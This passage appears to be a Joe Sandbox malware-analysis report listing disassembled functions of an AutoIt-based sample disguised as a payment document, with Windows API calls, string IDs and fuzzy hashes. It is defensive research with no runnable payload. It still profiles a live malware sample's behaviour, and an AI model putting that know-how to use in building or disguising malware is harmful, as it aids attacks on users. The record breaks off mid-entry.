                                                                              • Instruction Fuzzy Hash: 7C41AF71E002099FCB14DFA9C8829FEBBF9FF59324F154069E505A7262E7349D81CB91
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 0095D130
                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0095D13A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CrackInternet_wcslen
                                                                              • String ID: |
                                                                              • API String ID: 596671847-2343686810
                                                                              • Opcode ID: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                              • Instruction ID: ee19f6cb99d55c74ec4caadf77f065a3201d32480778af38a04809cff5118bae
                                                                              • Opcode Fuzzy Hash: af3bf968825a64c4d3b87f93a774602c91566bcb973c560e3d6934e3ac948d10
                                                                              • Instruction Fuzzy Hash: 5E317E71C01219EBCF15EFA6CC85AEE7FB9FF05340F100059F819A6161EB31AA56CB61
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 00973621
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0097365C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$DestroyMove
                                                                              • String ID: static
                                                                              • API String ID: 2139405536-2160076837
                                                                              • Opcode ID: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                              • Instruction ID: a894cce392cbd657709fe28f5c957bd1646f454138315c3081a8660147533554
                                                                              • Opcode Fuzzy Hash: b06e413dec8db997c67e921d2ee9372e078882b7acfa2987c4f39ca557840bc1
                                                                              • Instruction Fuzzy Hash: 3F318E72210604AADB109F28DC81ABB73ADFF88724F10C619F9A997280DA31AD91D760
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0097461F
                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00974634
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: '
                                                                              • API String ID: 3850602802-1997036262
                                                                              • Opcode ID: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                              • Instruction ID: 0ab93869541a78e1bd1698ec3f806f1aaa150858cee816f650db9bd3fced8f90
                                                                              • Opcode Fuzzy Hash: 0cac043db23c2c72e73aba8fc2a058c65a92df9d202f58b6efbbc4210f1c6c1b
                                                                              • Instruction Fuzzy Hash: 15310775A0130A9FDB14CFA9C991BDA7BB9FF49300F14816AE909AB352D770A941CF90
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0097327C
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00973287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                              • Instruction ID: 33655c99404f258b811704e8d1d04bd6a139038cb1dd7a15d4fb7163d94ccf8c
                                                                              • Opcode Fuzzy Hash: 8458c0fa2514b4be404d456400add8e0490a2c9da2b22649ba05aff9ebad446f
                                                                              • Instruction Fuzzy Hash: 6011B6723041087FEF119E54DC85EBB376EEB99364F10C528F52CA7291D6319D51A760
                                                                              APIs
                                                                                • Part of subcall function 008E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                                • Part of subcall function 008E600E: GetStockObject.GDI32(00000011), ref: 008E6060
                                                                                • Part of subcall function 008E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                              • GetWindowRect.USER32(00000000,?), ref: 0097377A
                                                                              • GetSysColor.USER32(00000012), ref: 00973794
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                              • Instruction ID: 7ee0e9aae89f8c8b732e3312f9f44bc9e96d133dddc713b9d898c5bb5df0f2b5
                                                                              • Opcode Fuzzy Hash: 3d322309cd6107134447a701decb1633b2b9a9ef00ff98cd27f686a53ab7fd2e
                                                                              • Instruction Fuzzy Hash: 781129B2610209AFDB00DFA8CC46EEA7BB8FB09354F008918F959E2250E735E851AB50
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0095CD7D
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0095CDA6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                              • Instruction ID: f7aa57339800a4275453c02eeff1886c853b9b027bac7691cdfce34228af7d54
                                                                              • Opcode Fuzzy Hash: 6d496f61c9775429eca0efd3d2174d23de7414109d4685b9ff801924ba230c16
                                                                              • Instruction Fuzzy Hash: 4611A3F22157357ED7288A678C45FE7BEBCEB127A5F00462AB909D20C0D6649848D7F0
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 009734AB
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009734BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                              • Instruction ID: 9d694a802690189f7c8c47e1de1d2ae4a717ea5cd0bb424519ac0727c6dbdbaf
                                                                              • Opcode Fuzzy Hash: 2d09b41bc72ba7ae4e4637f6667d33dffe323d88692fc4eee361908d8b7d716e
                                                                              • Instruction Fuzzy Hash: 5E11BF72110108ABEB154F64DC84AAB376EEB55378F50C724FA68931E0C731DC91A750
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 00946CB6
                                                                              • _wcslen.LIBCMT ref: 00946CC2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$BuffCharUpper
                                                                              • String ID: STOP
                                                                              • API String ID: 1256254125-2411985666
                                                                              • Opcode ID: f7bb739a7394cdb32592f3cd22bfcd51f04a73872cdac239779b24d5d09f4f37
                                                                              • Instruction ID: 5d864e1e6771a6bc704d3112a46e84455ed6554b4c36e18f6e5dded219fa167e
                                                                              • Opcode Fuzzy Hash: f7bb739a7394cdb32592f3cd22bfcd51f04a73872cdac239779b24d5d09f4f37
                                                                              • Instruction Fuzzy Hash: 3F01C072A105278ACB20AFBDDC80DBF77A9FF627187510938E9A2961D0EB31DD40C652
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00941D4C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 624084870-1403004172
                                                                              • Opcode ID: c840bf7787fea800cd10ccb9adc5138e6f2faa2dd88f3bb95280422acf8e387a
                                                                              • Instruction ID: a0ec848224502dc1f665e2e2cacf8fabc72852782b1caea7b02caffe6642fd07
                                                                              • Opcode Fuzzy Hash: c840bf7787fea800cd10ccb9adc5138e6f2faa2dd88f3bb95280422acf8e387a
                                                                              • Instruction Fuzzy Hash: AB01D8B1A41214AB8B18FFA4CC51DFE7368FB47350B140A19F862972D1EA7059488661
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00941C46
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 624084870-1403004172
                                                                              • Opcode ID: 119b698586d46427b9659e5e02c6da2ad8fb1c24b4335a603aeee216627cffa4
                                                                              • Instruction ID: da48cc0bcd4bf2efa5a008c8ec055e667ff16aab2188bbf360c7136251e599ba
                                                                              • Opcode Fuzzy Hash: 119b698586d46427b9659e5e02c6da2ad8fb1c24b4335a603aeee216627cffa4
                                                                              • Instruction Fuzzy Hash: 3C01A77578111867CB18FBA4CD92EFF77ACEB52341F140419E886A7281EA649F48C6B2
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00941CC8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 624084870-1403004172
                                                                              • Opcode ID: b422006541000eed97422a95b7197adf0ee91db64ee238aba0bdd283746c0c5f
                                                                              • Instruction ID: 87068d18fe16c69a111eeaa11afd354a2eeab63989dc265aa6871f2ceacb8907
                                                                              • Opcode Fuzzy Hash: b422006541000eed97422a95b7197adf0ee91db64ee238aba0bdd283746c0c5f
                                                                              • Instruction Fuzzy Hash: E901D6B179011867CB14FBA5CE91EFE73ACAB12341F540419BC82B3281FA609F48C6B2
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00941DD3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 624084870-1403004172
                                                                              • Opcode ID: e43f43d96ff5c0878938a46d24287f24002128e7e3175a41893b7f105a8f035e
                                                                              • Instruction ID: 714184f2bade47b9b643e7f5f6fd796d06123c14f64bdfe1bc6c793276b9a935
                                                                              • Opcode Fuzzy Hash: e43f43d96ff5c0878938a46d24287f24002128e7e3175a41893b7f105a8f035e
                                                                              • Instruction Fuzzy Hash: CEF0A4B1F5121466DB14F7A9CC92FFE776CFB42350F540D19F862A32C1EAA05A4882A1
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID: 3, 3, 16, 1
                                                                              • API String ID: 176396367-3042988571
                                                                              • Opcode ID: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                              • Instruction ID: 70eb26b633ca3eda494f64afb3339bbb43c4610a60050b2bf3a28065de0911e5
                                                                              • Opcode Fuzzy Hash: fd3102558ddeb3f8179a86ad98873fba75d494861c7639be238c53a39e8b4e84
                                                                              • Instruction Fuzzy Hash: 14E02B4220522014D23112BAACC5B7FD68ECFC5F90710183BFE81C22BAEE948D9193A1
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00940B23
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Message
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 2030045667-4017498283
                                                                              • Opcode ID: 9e7653ac133c81cc954e7b1aeebec0c5c57e64e5a0a3731b2732ffae3322ef58
                                                                              • Instruction ID: b9d84d7a6bb80fead54510ae23419fbd2ed667e62fc21a9e55d91ad0cf092697
                                                                              • Opcode Fuzzy Hash: 9e7653ac133c81cc954e7b1aeebec0c5c57e64e5a0a3731b2732ffae3322ef58
                                                                              • Instruction Fuzzy Hash: 7AE0D8733443082AD21436587C03F897A84DF45B54F10442EF78CD94C38AE1249006EA
                                                                              APIs
                                                                                • Part of subcall function 008FF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00900D71,?,?,?,008E100A), ref: 008FF7CE
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,008E100A), ref: 00900D75
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008E100A), ref: 00900D84
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00900D7F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 55579361-631824599
                                                                              • Opcode ID: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                              • Instruction ID: 19a1d949961e509047e756cf31c3a044eb965aab9b8ce41590551346caeb41e7
                                                                              • Opcode Fuzzy Hash: c03e9510445c91ed41674ba170f8e08e17b6d3736db80e40edb5490d1de748bd
                                                                              • Instruction Fuzzy Hash: 2AE06DB12007418FD7309FB8E8043467BE4BF40744F00892DE49AC6692EBB0E4888BA2
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0095302F
                                                                              • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00953044
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$FileNamePath
                                                                              • String ID: aut
                                                                              • API String ID: 3285503233-3010740371
                                                                              • Opcode ID: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                              • Instruction ID: 47da988782df8b08e7e327ec00b4eba3b063bf2778b7a173e279acf8fce7626a
                                                                              • Opcode Fuzzy Hash: cfd51b1d9c4ccc2d056b827d218d750391c388e4d5160f1e9dd9ceb653706fbd
                                                                              • Instruction Fuzzy Hash: 2CD05EB350032877DB20A7A4AC0EFCB3A6CDB05750F4002A1B669E2096DAB0DA84CBD0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime
                                                                              • String ID: %.3d$X64
                                                                              • API String ID: 481472006-1077770165
                                                                              • Opcode ID: 17cffa6fdd60d89bbf8bebee0ecac0d541e2b51d8caec1a9c262886decccb497
                                                                              • Instruction ID: 519608edb77107da452723280d53968071e97ae755539fa458becd72c00c65c6
